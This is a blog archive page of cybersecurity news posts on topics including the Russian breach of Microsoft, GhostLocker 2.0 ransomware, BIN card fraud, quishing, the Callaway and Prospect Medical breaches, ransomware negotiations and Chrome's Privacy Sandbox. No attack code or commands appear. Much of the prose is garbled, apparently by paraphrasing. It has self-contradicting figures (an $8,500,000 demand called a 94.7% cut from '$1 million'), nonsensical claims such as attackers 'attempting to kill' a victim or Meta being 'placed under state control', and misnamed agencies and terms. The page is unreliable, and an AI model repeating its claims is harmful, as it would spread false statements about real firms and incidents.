Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label cybercriminals. Show all posts

Microsoft Source Code Heist: Russian Hackers Escalate Cyberwarfare

 


There was an update on the hacking attempts by hackers linked to Russian foreign intelligence on Friday. They used data stolen from corporate emails in January to gain access to Microsoft's systems again, which were used by the foreign intelligence services to gain access to the tech giant's products, which are widely used in the national security establishment in the United States. 

Analysts were alarmed by the disclosure as they expressed concerns about whether the U.S. government could use Microsoft's digital services and infrastructure safely. Microsoft is one of the world's largest software companies which provides systems and services to the government, including cloud computing. 

It has been alleged that the hackers have in recent weeks gained access to Microsoft's internal systems and source code repositories using information stolen from the company's corporate email system. The tech firm said that the hackers had used this information to access the company's corporate email systems. It is the nuts and bolts of a software program which make it work. 

Therefore, source code is of great importance to corporations - as well as spies trying to penetrate it. With access to the source code, hackers may be able to carry out follow-on attacks against other systems if they have access. During the first days of January, Microsoft announced that its cloud-based email system had been breached by the same hackers, days before another big tech company, Hewlett Packard Enterprise, announced that its cloud-based email system was breached. 

Although the full scope and purpose of the hacking activity is unclear, experts say the group responsible for the hack has a history of conducting extensive intelligence-gathering campaigns for the Kremlin. According to Redmond, which is examining the extent of the breach, the Russian state-sponsored threat actor may be trying to take advantage of the different types of secrets that it found in its investigation, including emails that were shared between Microsoft and its customers. 

Even though they have contacted the affected customers directly, the company didn't reveal what the secrets were nor what the extent of the compromise was. It is unclear what source code was accessed in this case. According to Microsoft, as well as stating that it has increased its security investments, the adversary ramped up its password spray attacks more than tenfold in February, in comparison to the "amount of activity" that was observed earlier in the year. 

Several analysts who track Midnight Blizzard report that they target governments, diplomatic agencies, non-governmental organizations, and other non-governmental organizations. Because of Microsoft's extensive research into Midnight Blizzard's operations, the company believes the hacker group might have targeted it in its January statement. 

Ever since at least 2021, when the group was found to have been behind a series of cyberattacks that compromised a wide range of U.S. government agencies, Microsoft's threat intelligence team has been conducting research on Nobleium and sharing it with the public. According to Microsoft, persistent attempts to breach the company are a sign that the threat actor has committed significant resources, coordination, and focus to the breach effort. 

As part of their espionage campaigns, Russian hackers have continued to hack into widely used tech companies in the years since the 2020 hack. US officials and private experts agree that this is indicative of their persistent, significant commitments to the breach. An official blog post that accompanied the SEC filing on Friday said that the hackers may have gathered an inventory of potential targets and are now planning to attack them, and may have enhanced their ability to do so by using the information they stole from Microsoft. 

Several high-profile cyberattacks have occurred against Microsoft due to its lax cybersecurity operations, including the compromise of Microsoft 365 (M365) cloud environment by Chinese threat actors Storm-0558, as well as a series of PrintNightmare vulnerabilities, ProxyShell bugs, two zero-day exchange server vulnerabilities known as ProxyNotShell that have been reported as well. 

Microsoft released the February Patch Tuesday update which addressed the admin-to-kernel exploit in the AppLocker driver that was disclosed by Avast six months after Microsoft accepted Avast's report about the exploit. The North Korean adversary Lazarus Group, which is known for exploiting the Windows kernel's read/write primitive to establish a read/write primitive on the operating system, used the vulnerability to install a rootkit on the system. The company replaced its long-time chief information security officer, Bret Arsenault, with Igor Tsyganskiy in December 2023 to alleviate security concerns.

GhostLocker 2.0 Unleashes Cyber Haunting Spree in the Middle East, Africa, and Asia

 


A new version of the infamous GhostLocker ransomware has been developed by cyber criminals, and they are now targeting users across the Middle East, Africa, and Asia with this ransomware. With the help of the new GhostLocker 2.0 ransomware, two ransomware groups have joined forces in attacking organizations in Lebanon, Israel, South Africa, Turkey, Egypt, India, Vietnam, and Thailand in double-extortion ransomware attacks, which have been conducted by two groups of ransomware groups, GhostSec and Stormous. 

The attack targets technology companies, universities, companies that manufacture, transport, and government organizations that have been rendered inaccessible by the file-encrypting malware. These are the main targets of these attacks, which attempt to scam victims into paying for decryption keys that would allow them to retrieve the data that was encrypted and render it inaccessible. 

According to researchers at Cisco Talos, who discovered the new malware campaign and cyberattack campaign being run by the criminals, the attackers had also threatened to release exposed victims' sensitive data unless they paid hush money to keep the information hidden. As a result of both GhostLocker and Stormous ransomware groups revamping their RaaS programs, they have introduced a new one called STMX_GhostLocker, which offers their affiliates several options for the distribution of ransomware. 

As well as on the Stormous ransomware data-leak site, the GhostSec and Stormous groups also announced they had been tampering with data on their Telegram channels. A Cisco Talos blog post released this week suggested that GhostSec was targeting Israel's industrial systems, critical infrastructure, and technology companies, according to the blog post. It is believed that there are victims, including the Israeli Ministry of Defense, but the motive of the group does not seem to be one of kinetic sabotage so much as it is one of profit-driven objectives. 

Telegram chats suggest that at least part of the motivation of the group (at least initially) is to raise funds for hacktivists and threat actors, as indicated by conversations in the group's Telegram channel. As a curious note, GhostSec has adopted the same name as Ghost Security Group, well-known as a hacktivist organization known for targeting ‘pro-Islamic State group’ websites and making other cyberattacks, though there remains no confirmation that the two organizations are linked. 

As a result of successful joint operations between the Stormous gang and Cuban ministries last July, the Stormous gang added the GhostLocker ransomware program to its existing StormousX program. A group of hackers calling themselves GhostSec has been carrying out attacks on corporate websites, including a national railway company in Indonesia as well as a corporate energy supplier in Canada. 

Cisco Talos has reported that the group could be using the GhostPresser tool as a means to conduct cross-site scripting (XSS) attacks against vulnerable websites when it launches attacks against them. This week, the kingpins of ransomware are also offering the GhostSec deep-scan tool suite that was created by them, which would allow potential attackers to sweep websites of potential targets to find ransomware implants. 

With the Python-based utility, users will be able to perform specific functions, such as scanning for specific vulnerabilities on targeted websites (by referring to specific CVE numbers) using placeholders. In Cisco Talos' opinion, "the promise of functionality demonstrates a continuous evolution, which goes hand in hand with GhostSec's continuous development of tools for their arsenal." In the chats that the malware's developers are having in their chats, they seem to refer to "ongoing work" on "GhostLocker v3", according to security researchers. 

In addition to encrypting files on the victim's computer with the extension .ghost, GhostLocker 2.0 drops a ransom note on the victim's machine and asks for a ransom to unlock it. Potential targets are being issued warnings that their compromised data will be publicly disclosed unless they reach out to ransomware operators within a strict seven-day timeframe. Affiliates of the GhostLocker ransomware-as-a-service are equipped with a sophisticated control panel enabling real-time monitoring of their attacks, all seamlessly registered on the dashboard. 

The command-and-control server for GhostLocker 2.0 is geolocated in Moscow, resembling the setup of earlier ransomware versions. Affiliates who opt to pay gain entry to a customizable ransomware builder, allowing the configuration of various options, including the target directory for encryption. The ransomware, designed by developers, is adept at exfiltrating and encrypting files with extensions such as .doc, .docx, .xls, and .xlsx, encompassing Word-created documents and spreadsheets. 

Unlike its predecessor developed in Python, the latest iteration of GhostLocker is coded in the GoLang programming language. Despite this shift, the functionality remains akin to the previous version, with a notable enhancement: the encryption key length has been doubled from 128 to 256 bits. In response to this menacing campaign, organizations are advised by Cisco Talos to fortify their defences through a comprehensive security approach, facilitating prompt attack detection. 

This involves studying the tactics, techniques, and procedures (TTPs) employed by the GhostLocker group, as well as ensuring up-to-date detection signatures for the newest GhostLocker ransomware version. Cisco further recommends that organizations fortify their web servers with layered defence mechanisms, incorporating demilitarized zones (DMZs) to isolate public-facing systems. This is particularly pertinent given the GhostSec group's track record of conducting denial-of-service (DoS) attacks on victim websites. 

Despite these precautionary measures, the true impact of the recent GhostLocker attacks remains elusive. Cisco has underscored the uncertainty surrounding the number of potential victims affected. While some data has surfaced on the leak site, it remains challenging to ascertain its accuracy, including the extent of financial transactions, if any. As the cybersecurity landscape evolves, GhostLocker ransomware emerges as a persistent threat, underscoring the critical need for organizations to continuously enhance their security measures. 

The adoption of a defence-in-depth strategy, meticulous analysis of threat actors' TTPs, and regular updates to detection mechanisms are imperative in safeguarding against the ever-evolving tactics of malicious entities. The call for layered defence, including the implementation of DMZs for web servers, reinforces the proactive approach required to mitigate the risks associated with this sophisticated ransomware campaign.

‘BIN’ Attacks: Cybercriminals are Using Stolen ‘BIN’ Details for Card Fraud


While cybersecurity networks might be boosting themselves with newer technologies, cybercrime groups are also augmenting their tactics with more sophisticated tools. 

The latest example in cyberspace is the “BIN attacks,” that targeted small businesses. The tactic involved manipulation of the Bank Identification Number (BIN) of credit cards that allowed threat actors to put the stolen card details through trial and error on unsuspecting e-commerce websites. 

Behind the Scenes of the 'BIN' Attacks

In 2023 alone, the payment card fraud amounted to a whopping $577 million, which was 16.5% more than in 2022. Among its victims, the Commonwealth Bank was the one that experienced the fraud when a Melbourne wholesaler faced a barrage of 13,500 declined e-commerce transactions in a month. 

The incident, previously noted as a clerical error, turned out to be an event of cybercrime that impacted both businesses and consumers. 

The cybercriminals initially obtained the first six digits of a credit card, called the Bank Identification Number (BIN). This information was then used for trial and error to determine what combinations of card numbers, expiration dates, and security codes work. Subsequently, the card data that were taken are verified through inconspicuous transactions to ascertain their authenticity. Once verified, card numbers that have been compromised are either sold by fraudsters or used in larger-scale fraudulent transactions.

Customer Accounts Compromised

Commonwealth Bank account holders, Bob Barrow and John Goodall, discovered that they were the targets of fraudulent activities. Despite having no online activity with their cards, they were astonished when they found out about the transactions made on their accounts. This made them question the security of their financial information.

Credit card numbers are more random and limitless than one might believe. Out of the sixteen digits on a card, the six-digit BIN leaves just ten that follow a pattern. Because there are comparatively fewer options, cybercriminals can leverage automated methods to quickly guess valid combinations, which presents a serious threat to conventional security measures. 

While the affected entities are expected to come up with more stringent safety measures, the responsibility does not solely lay on the banks. Financial institutions do not always conduct the transactions; they are often the victims themselves who issue the cards. The attacks emphasize the necessity of a multi-layered safeguard, with companies utilizing strong fraud prevention systems and online shop security-focused payment processors like Stripe and Square. This is necessary since a BIN attack's aftermath might cause firms to go bankrupt.

Report: Retailers Face Challenges in Coping with Ransomware Attacks

 

In a disconcerting revelation, a recently released report suggests that retailers are finding themselves increasingly outmatched in the ongoing battle against ransomware operators. Conducted by cybersecurity experts Sophos, the survey enlisted the perspectives of 3,000 IT and cybersecurity leaders from small and medium-sized businesses (SMBs) and enterprises worldwide, with a particular focus on 355 respondents hailing from the retail sector. 

The findings are rather sobering, indicating that a mere 26% of retailers were successful in thwarting a ransomware attack before succumbing to having their valuable data encrypted. This figure represents a noticeable decline from the preceding year's 28%, and even more starkly from the 34% recorded two years prior.

Chester Wisniewski, the Director of Global Field CTO at Sophos, sounds a cautionary note, deeming the survey a resounding wake-up call for organizations within the retail industry. His message is clear: retailers must urgently fortify their security measures in the face of the escalating ransomware threat.

The report also sheds light on the protracted recovery process faced by victims who opt to meet the ransom demand. Among those who acquiesced, the median recovery cost, excluding the ransom payment itself, surged to four times that of those with a functional backup, reaching a staggering $3 million compared to $750,000. 

Approximately 43% of victims opted to pay the ransom, prompting Wisniewski to caution against shortcuts, underscoring the imperative of rebuilding systems to prevent cybercriminals from reaping the rewards of their malicious activities.

While there is a glimmer of optimism for retailers in the report - the percentage of firms targeted by ransomware threats dropped from 77% to 69% compared to the previous year - the recovery times have taken a hit. The proportion of companies able to recover in less than a day dwindled from 15% to a mere 9%, while those grappling with recovery periods exceeding a month increased from 17% to 21%.

Ransomware, as the report highlights, typically gains entry through the actions of unwitting employees, such as downloading malware or inadvertently providing attackers access to crucial endpoints. 

Consequently, the report underscores the critical importance of comprehensive employee education regarding the perils of cyberattacks. In addition to fostering employee awareness, safeguarding against ransomware necessitates strategic measures such as regular backups of critical systems and data, coupled with the implementation of robust endpoint protection services. The call to action is clear - retailers must fortify their cybersecurity defenses comprehensively to navigate the evolving threat landscape successfully.

Quishing Emerges as a Leading Cybersecurity Challenge

 


Researchers are predicting that cybercriminals will employ email-based quashing attacks as a means of stealing data from users. Several quishing campaigns are known to have been large, long-running, and dynamic, based on attack cadence and variations within the lures and domains featured in the messages used by the campaigns. 

A study released by the Global State of Mobile Phishing Report recently raises some sobering insights into the widespread use of mobile phishing attacks. The report noted that over 50% of the personal devices used by employees of a company had been hacked every quarter, which is an astounding number. 

Technology is constantly evolving to make users' personal and professional lives more convenient in the era of digital technology, as the usage of technology gradually increased over the years. One of the advancements that have made life easier for consumers has been the Quick Response (QR) code. The user can either share the URLs of websites and contact information, or they can pay with this two-dimensional barcode which is easy to read. 

In addition to improving our daily lives, QR codes have also created new avenues for cybercriminals to exploit, which has made it easier for them to steal information. This method of phishing is also known as quishing and poses a significant threat to individuals and organizations alike. QR codes are phishing attacks that have been on the rise for years. 

Even though "squishing" sounds all cute and squishy, it's a serious practice that has to be taken seriously. A QR code can be obtained by generating a fake email that contains a QR code that is inserted into the email, and then sending it to a person as a phishing email. 

In an attempt to trick the recipients of an email attack into visiting malicious websites or downloading malware onto their devices, hackers use QR codes embedded in the email to trick them. Social engineering tactics are usually used in these kinds of attacks to exploit the trust that people place in emails because they often put their trust in them. 

Recent findings regarding the effectiveness of mobile phishing attacks have been released in the Global State of Mobile Phishing Report. Over half of a company's employees' devices are exposed to phishing every few weeks, and at least one-third of those are not even aware that it is happening. 

Additionally, there was a seven-fold increase in the number of QR code phishing reports in Q2 of 2022. Many industries are targeted by these types of attacks, including insurance, legal, financial, and healthcare. A high level of regulation is enforced in these industries as a result of the sensitive and valuable nature of their data. As a result, they are a good target for cybercriminals as they are easy to reach. 

Increasingly, QR codes are appearing everywhere: they are in restaurants, mass vehicles, commercials, signs, walls, bathrooms, advertisements on billboards and posters; and even companies are shipping their products with QR codes so that consumers can access the manual via their phones. 

There are two main ways that criminals are attempting to quench attacks at the moment: they send targets a QR code via email and then try to crack it. In many cases, those emails are simply a call to action for users to verify their accounts and to act within a specific time frame otherwise their accounts will be locked or closed. A QR code would be inserted into an email on a desktop computer by the user, and once scanned, it would cause havoc on the computer.  

Using traditional email filtering methods, it is hard to detect QR code attacks since there are no embedded links or malicious attachments to scan. In addition, email filtering is not designed to follow a QR code to its destination to look for malicious content. The threat is also moved to another device which is more likely not to be protected by corporate security software, as well as shifting the actual threat to another device. 

Detecting these attacks can be done using artificial intelligence and image recognition technology. Fake QR codes are usually not the only sign that a malicious email is being sent. In addition, AI-based detection will take into account other signals as well - such as the sender's name, the content, the size, and the placement of images – to determine whether a message is malicious. To detect and prevent QR code scams, Barracuda Impersonation Protection will employ several techniques, as well as others. 

Currently, there are many quashing attacks targeting individual consumers, but enterprises, as well as their employees, are also at risk of squishing attacks. Researchers from HP and Abnormal Security discovered, in particular, that email-based QR phishing campaigns, like those uncovered by the researchers, could be used to steal credentials or spread malicious software to business accounts. 

Fraudulent QR Code Signs


Receivers need to pay close attention to the labels on the quashing codes to see that these codes are marked. These include: 

  • There are several errors on destination websites, including spelling errors, poor-quality images, and inadequate design. 
  • Rather than beginning with HTTPS, a URL starts with HTTP.
  • The true destination site is hidden by short URLs that are unreadable. 

Golfing Community Shaken as Calloway Data Breach Hits One Million Fans

 


At the start of August, Topgolf Callaway (Callaway) was hacked by hackers, exposing the sensitive account and personal information of over 1 million customers to the dangers of identity theft. There are many manufacturers and retailers of various types of sports equipment in the US, however, Callaway is the leading brand of golf gear and accessories, including clubs, balls, bags, gloves, and hats.

Amounted to approximately $1.2 billion in revenue in the past year, the company has a presence in more than 70 countries globally. A total of roughly 25,000 people are employed at this company. In the company's product line, there is a variety of golf gear that is made by Callaway. 

Over 1 million people were affected by a data breach reported by the company. As part of an "IT system incident" that began on August 1 and involved some users of Topgolf Callaway Brands Corp.'s e-commerce websites, Topgolf Callaway Brands Corp. has been alerting customers that certain users' information had been exposed. 

A notification email was sent by the company to the victims last week, explaining what had happened and what steps were being taken by the company to address the issue. According to the email, there was an intrusion by an unknown malicious external party into the company's e-commerce system on August 1, impacting the availability of some of the company's e-commerce services as a result. 

The cyber intrusion occurred on an unknown date in the past. A security breach has affected users of several Callaway Golf sites, including Callaway Golf Preowned, Odyssey, Ogio, and Odyssey. As a result of the attack, sensitive user data, such as full names, shipping addresses, e-mail addresses, phone numbers, order history, account passwords, and security questions, were stolen by the attackers. 

As per the notice, no sensitive information such as payment information, ID information, or Social Security Numbers (SSNs) were collected. Upon investigation into this matter, it has been found that data about users of the website, including their names, mailing addresses, email addresses, phone numbers, order history, passwords for their accounts, and answers to their security questions are impacted. 

A police report has been filed and the police have been notified immediately. Approximately 1,114,954 pieces of private information were exposed in total during the data breach. Because the attackers stole passwords and answered security questions, 

A public notice about the breach was made on August 29th by the Maine Attorney General's office. Maine has strict rules concerning cyberattacks that compromise the privacy of any of its residents, of whom 2,219 were affected by the hack. 

There have been no breaches of payment card and government identification numbers, such as Social Security numbers, that have affected credit and debit cards. A company representative confirmed that the company does not store any of this information. 

There was a lot of time when the security questions had to be disabled, and the passwords had to be reset by force almost a month later. Callaway reset everyone's log-in credentials and compelled everyone to change their password at the next login time until a new password could be created. The Maine Division of Environmental Protection notified all residents affected by this action by email on the same day that this action was completed. 

Upon resetting their passwords, customers will be able to access their accounts once they have regained access to them. There is a strong recommendation that users should also change the passwords on other websites where they use the same login information. 

Topgolf Callaway has set up a special toll-free incident response line, which is available to answer any questions or concerns that individuals may have. Detailed instructions can be found on the company's website, as well as a dedicated, toll-free incident response line. 

Although it is unclear whether the incident is a ransomware attack, as many of the company's e-commerce services have been affected by the incident, it is a strong possibility that it is indeed a ransomware attack. 

The attack, if it was indeed a ransomware attack, has so far not been claimed by any ransomware groups, nor has it been attempted to be sold through the dark web. It is unlikely, however, that this information won't surface somewhere on the dark web someday. 

There is a possibility that the data collected could be used for identity theft and phishing attacks. However, the company is taking measures to protect its customers' data through proactive measures. To regain access to the system, users are automatically directed to the “callawaygolf.com/reset-password” page where they can find instructions on how to proceed with resetting their password. 

Following the data theft, the company worked fast to reset passwords for all users who had their passwords stolen. The use of the same passwords for other websites or online services should be avoided if you are already consistently using the same password for multiple websites or online services. 

Passwords should be made up of alphanumeric and symbol characters only. Credential-stuffed attacks can be minimized by adopting this precautionary measure. Callaway customers need to stay cautious when communicating with unknown senders regarding the possibility of sharing additional data, and they should treat them as potentially malicious messages.

Ransomware Vendetta: Rhysida Group Strikes Prospect Medical, Warns of Auctioning Stolen Data

 


It has been claimed that Rhysida, an ever-evolving ransomware group, is responsible for the recent cyberattack on Prospect Medical Holdings during which hospitals and medical facilities in four states have been attacked. As a result, Prospect Medical Holdings was forced to take its systems down earlier this month. 

The Prospect Health Group operates 16 hospitals in California, Connecticut, Pennsylvania, and Rhode Island, as well as more than 165 clinics and outpatient facilities throughout these states. According to Callow, many US healthcare systems have been affected by ransomware this year, infecting at least 53 hospitals under their control, and at least 20 of these organizations have had their data stolen as a result of the attack. 

The Department of Health and Human Services issued an alert earlier this month to warn people about Rhysida, a ransomware-as-a-service group that first arose in mid-May. The group is currently in its infancy and does not have some advanced features such as plaintext strings that reveal registry modification commands as well as some advanced features such as plaintext strings that display registry management commands. 

There have been major attacks on organizations in several sectors including education, government, manufacturing, technology, and managed service providers by Rhysida. As part of its ongoing data leak investigation, the Federal Bureau of Investigation has revealed that most of the data stolen from eleven victims have been uploaded to the threat actor's data leak site between June and the beginning of August. 

As a result of a cyberattack launched by the Rhysida ransomware group on Prospect Medical Holdings, the group claims to have gained access to 500,000 social security numbers, confidential corporate records, and patient records from the company. 

A ransom note was reportedly displayed on employee screens the day after the attack, warning that their network had been compromised and their devices had been encrypted as a result of the attack, which was believed to have occurred on August 3rd. 

There is a claim that Rhysida has more than one terabyte of stolen data on her hands, along with an SQL database containing more than 1.3 terabytes of data. In the listing on the dark web, the group offered to sell the data for 50 bitcoin, which would equate to roughly $1.3 million, based on the listing that was made available. 

BleepingComputer later found out that the Rhysida ransomware gang was behind the attack even though PMH did not respond to questions about the security incident. According to current reports, PMH hospital networks, including CharterCare, have been able to successfully restore the functionality of the hospital networks' systems. However, efforts remain ongoing to make sure that patient records are reinstated as soon as possible. 

Earlier this month, the Department of Health and Human Services (HHS) warned that the hacker group Rhysida seemed to be responsible for recent attacks against healthcare organizations, with a claim of responsibility for the attack on Prospect Medical. Described by the Department of Health and Human Services (HHS) as a new ransomware-as-a-service (RaaS) group, Rhysida has emerged since May 2023. 

An HHS official said the group encrypts a target's networks through Cobalt Strike and phishing attacks to breach their targets' networks and plant their malicious payloads on those networks. Once the victim has not paid the ransom, the group threatens the victim by releasing all of the data that has been exfiltrated. HHS has indicated that Rhysida is still in its infancy and there are limited advanced features that it has developed, as evidenced by its name Rhysida-0.1, and the lack of advanced features. 

According to the report, the ransomware also leaves PDF notes in the affected folders instructing victims to contact the group through their portal and pay in Bitcoin. There are numerous countries across Western Europe, North and South America, as well as Australia that have been affected by Rhysida and its victims. 

It is primarily focused on the education, government, manufacturing technology, and managed services industries that are attacked by these cyber criminals. As exemplified by the attack on PMH, they have recently attacked the healthcare and public health sectors, and this has had a significant impact on the healthcare industry. There have been several ransomware gangs who have claimed credit for attacks in the past, including Rhysida, said Emily Phelps, director at Cyware.

Behind Closed Cyber Doors: 50 Ransomware Negotiations' Unexpected Insights

 


A cybersecurity expert will usually recommend that negotiators should be avoided when trying to resolve the issue of ransomware hackers. A victim recently defied conventional wisdom and attempted to negotiate with their attackers on December 30, 2020, despite their attackers attempting to kill them. 

As the victim typed the words "Help?" At one point during the compromise of the computers, a response was received from one of the hackers offering to negotiate with the victim. During the interview, the hackers admitted that they had encrypted the victim's network and data in addition to downloading internal documents and files from the victim's network. As a ransom, they requested a payment of $8,500,000 for the key to unlock the encrypted files. 

Unexpectedly, there was a misunderstanding in the negotiation that led to the breakdown of the deal. As a result, the hackers mistook the victim's wishes for the destruction of files and did not provide the decryption key to do so. In the end, the ransom demand was markedly reduced, resulting in a final amount of only $450,000 being agreed upon, thereby resulting in a 94.7% reduction from the original demand of $1 million. 

In the case of ransomware incidents, the details are usually shrouded in secrecy and made to remain out of the public domain as long as possible. Despite the secrecy, Valéry Marchive, a French journalist who specializes in cybersecurity, does not like it. This can be used as a weapon in the fight against ransomware gangs, as all these cloak-and-dagger conversations he has had with these criminal gangs provide valuable insight into how they operate and can be used by them to attack.

Marchive has been compiling a database of ransomware negotiation chats over the past few years, and as of recent made the database available to the public as part of its effort to reduce ransomware attacks. The recent research report on the data used by Cyber Threat Intelligence Analyst Calvin So focuses on how stylometric analysis (essentially, the study of writing styles) can help identify patterns and individuals based on the text dialogue they use within the report. 

The results of an analysis of negotiation transcripts of 50 trial cases from Marchive's archives show that victims who negotiate tend to pay much less than the initial ransom demand, resulting in a significant reduction in the amount asked. There has been a fair amount of negotiation between the victims and the pirates, and on average only half of the original demand was paid (52.7%). It is important to note that only one victim among the sample paid the full amount without negotiating with the con artist. 

In some interesting cases, ransomware hackers have adopted a very professional, congenial approach to communicating with victims when faced with ransomware threats. As a security vulnerability exposer, they will bill victims for their service and present themselves as a threat to your computer system. In addition to victimizing, victims sometimes engage in friendly banter with their attackers, which may suggest that their relationship with their attackers is unusual. 

There is No Set Deadline


The most common thing that victims negotiate with their lawyers is an extended deadline. When a victim appears willing to pay for the hack, it is free for the hackers, as long as they are willing to negotiate and take the victim to the table. The fact that hackers proposed reducing the ransom so long as the payment was posted as quickly as possible was a big clue that they were hacking.  

When hackers start negotiations, they often use this response as their first gesture as they want to initiate transactions as soon as possible, however, they are willing to extend this deadline as long as they feel progress is being made, or they think the victim is in the process of obtaining funds. 

A facade of civility conceals the fact that there are threats hidden both within and without the facade. When negotiations are at an impasse, hackers challenge their victims, taunt them, and issue ultimatums to end the negotiations. Even though negotiating with ransomware hackers is generally not recommended, a better understanding of how these negotiations happen can provide valuable insights into how to combat ransomware attacks in the future. 

Avoid Dealing With the Devil 


Even though anonymous company representatives may have come away relatively unscathed, this should not be taken as a sign that you should negotiate with ransomware groups – quite the opposite. 

It is important to remember that even though the company's sample set of transcripts did not show hackers reneging on their commitment to release the hostage data as soon as the victim paid for it, there is no guarantee that even if they release the data, they will not make a copy of it to sell it to others.   

Cybercriminal activity comes with a variety of risks, and this is just one of them. According to Max, there is no reason for the bad guys to carry out their plans since they have no incentive to do so. The money has been delivered, and that is a task completed for them, so they feel satisfied with their work.

One way to stick it to ransomware groups is to make sure you never fall prey to their ruse in the first place, but that should go without saying. As a result, most of the time, it is possible to prevent the vulnerability of individuals and companies to hackers by implementing some best practices. 

According to PCMag, the first step you should take is to implement a password policy that requires all passwords to be unique with at least 20 characters. There is an easy and essential policy that each employee with a work account should adhere to.

Furthermore, there should be a similar policy in place for all personal accounts of employees. Keeping that in mind, we strongly recommend you use a reliable password manager for managing your passwords across multiple accounts so that you can create and manage them easily. 

In addition, it is critical to ensure that all the devices installed on the work premises, such as smartphones and tablets, have security features enabled in their configurations. Ensure that you patch and update your operating system and software regularly, and be sure to perform regular backups of your data as well. For those users who are looking to protect themselves from ransomware, there is a wide variety of apps that can assist you.

FBI Alerts: Cybercriminals Exploiting Open-Source AI Programs with Ease

 

Unsurprisingly, criminals have been exploiting open-source generative AI programs for various malicious activities, including creating malware and conducting phishing attacks, as stated by the FBI.

In a recent call with journalists, the FBI highlighted how generative AI programs, highly popular in the tech industry, are also fueling cybercrime. Criminals are using these AI programs to refine and propagate scams, and even terrorists are consulting the technology to develop more powerful chemical attacks.

A senior FBI official stated that as AI models become more widely adopted and accessible, these cybercriminal trends are expected to increase.

Although the FBI did not disclose the specific AI models used by criminals, it was revealed that hackers prefer free, customizable open-source models and pay for private hacker-developed AI programs circulating in the cybercriminal underworld.

Seasoned cybercriminals are exploiting AI technology to create new malware attacks and improve their delivery methods. For example, they use AI-generated websites as phishing pages to distribute malicious code secretly. The technology also helps hackers develop polymorphic malware that can bypass antivirus software.

Last month, the FBI issued a warning about scammers using AI image generators to create sexually themed deepfakes to extort money from victims. The extent of these AI-powered schemes remains unclear, but the majority of cases reported to the FBI involve criminal actors utilizing AI models to enhance traditional frauds, including scams targeting loved ones and the elderly through AI voice-cloning technology in phone calls.

In response, the FBI has engaged in constructive discussions with AI companies to address the issue. One proposed solution is using a "watermarking" system to identify AI-generated content and images more easily.

The senior official emphasized that the FBI considers this AI threat a national priority, as it affects all programs within the agency and is a recent development in the cybercrime landscape.

Web Development Revolution: Chrome's Cookie-Free Tools

 


It has become increasingly common for browsers to use third-party cookies as part of their browsing process, which makes it possible for advertisers and bad actors to spy on large chunks of your browsing history to provide more relevant ads. There is no doubt that third-party cookies contribute to the functioning of websites and the experience of Internet users, but most experts agree that we need alternatives that are easier to control, regulate, and understand. 

Google announced in a blog post that it will enable the Privacy Sandbox APIs over the next few days to protect user privacy. There would be an initial rollout of these APIs for a small percentage of users with Chrome 115 installed. When the APIs become available, they would ramp up gradually over time. 

To get rid of browser cookies, Google developed a Privacy Sandbox in 2019 to rid itself of the problem. This is counter to Google's operation. The privacy feature on the site is not intended to completely stop advertisers from targeting audiences with their ads. Instead, it makes it harder for advertisers to access users' personal information. Google announced the Privacy Sandbox program in May 2023. It stated that the process would begin by July 2023 and be available to everyone. Finally, the day has come when that dream will become a reality. 

The Chrome Developers blog for Chrome 115 has more details about the upcoming "relevance and measurement APIs" introduced in Chrome 115. There are several APIs, including Topics APIs that categorize a user’s interests based on how they utilize the Internet. These APIs do not share this information with advertisers directly. There are also attribution reporting APIs, which can determine if ad clicks or views result in conversions. Besides the Protected Audience API (previously FLEDGE), which allows relevant advertising to be displayed to users based on their previous interactions with advertisers.

It is important to point out that these updates come shortly after the U.K.'s top privacy watchdog, Competition Markets & Authority, which is responsible for overseeing the development of Sandbox, released a set of guidelines for testing Sandbox just a few weeks ago. It has been proposed that Google will have to submit itself to more oversight by the CMA by 2021. This is to address concerns that removing third-party cookies may pose a new competitive challenge for companies that use personalized ads. As per the guidelines, reporting test results is particularly critical for ad-tech companies as it helps the CMA assess whether the Privacy Sandbox has addressed our competition concerns, which will help determine whether the Privacy Sandbox is effective. 

The matter of privacy and competition remains one of the biggest concerns facing Google and other digital advertising giants in Europe and the U.S. about the way they conduct their online advertising practices. A new lawsuit has been filed by the European Commission against Google, asserting that its ad-tech business violates the antitrust laws of the EU and suggesting potential steps to break up its massive ad-tech operation. It was noted by Norwegian legislators, as well as French regulatory agencies, that Meta was placed under state control due to its behavioral advertising. In contrast, Criteo was fined for using personal data for advertising. Various courts, lawmakers, and regulatory agencies in various countries have pressured other companies to use data for advertising purposes. 

A privacy sandbox, in essence, is a document that claims third-party cookies are a privacy disaster that needs to be fixed with an open, industry-wide standard that aims to accomplish this goal. A user tracking tool integrates into your browser so that it runs securely locally, which then means that data that is relevant and anonymous is only sent to websites and advertisers when it is relevant and relevant, such as what type of products or topics people may be interested in when visiting their website. By doing this, advertisers and publishers will not have to track users personally so they will no longer have to track their audience. 

The EFF, one of the privacy watchdogs that monitors privacy issues, has criticized the Privacy Sandbox for some of its original ideas. These include FLoC (Federated Learning of Cohorts), which was among its ideas. In response to feedback, Google pivoted and created a different approach, such as Protected Audience. This has not received the same criticism as the now-launched Protected Audience, as it does not follow the same approach. The Privacy Sandbox continues to be a subject of controversy among competitors such as Brave, partly because of concerns surrounding antitrust laws. 

In the beginning, the APIs will be turned on for a limited number of Chrome dev browser instances that are part of Google Chrome development. With the rollout progressing, Google will gradually increase the number of devices to monitor potential problems as the rollout progresses. The following are some of the APIs that were enabled for Chrome developers during this rollout - a few groups of developers will only encounter a subset of the newly available APIs activated so it is easier to detect and isolate issues associated with specific APIs during this rollout. 

There is a possibility that this process will begin next week, starting on the 24th of July, according to Google. The APIs will be released for about 35 percent of the browsers during the week so that the developers can test the APIs. According to the company, they plan to increase this to 60 percent by the end of August. During August, a Chrome 116 general availability date is expected to be announced. However, it is unclear when APIs will work for 99 percent of Chrome 115 browsers. 

At this stage of the testing program, Google says most of the small groups tested with limited access should have all the relevance and measurement APIs enabled. 'Only small, isolated groups are going to be maintained by the company, without each API being enabled for every small group. 

A couple of issues with onboarding and regulatory investigations have caused Google to delay the project, although it was originally projected to phase out third-party cookies in late 2023. The Competition and Markets Authority (CMA), which previously voiced concerns that the search giant's own advertising business would unfairly gain from the updated approach, published guidelines in June for third parties to follow when testing Google's Privacy Sandbox tools. 

It is well known that by passing the CMA's regulatory hurdles back in 2022, Google's plans for refusing or removing third-party cookies will have been approved (provided that Google sticks to the commitments it made to get approval), and the company said it "will continue to work closely with the CMA" before taking any further action to do so.

Ransomware Outbreak in Canada: Cybersecurity Meltdown

 




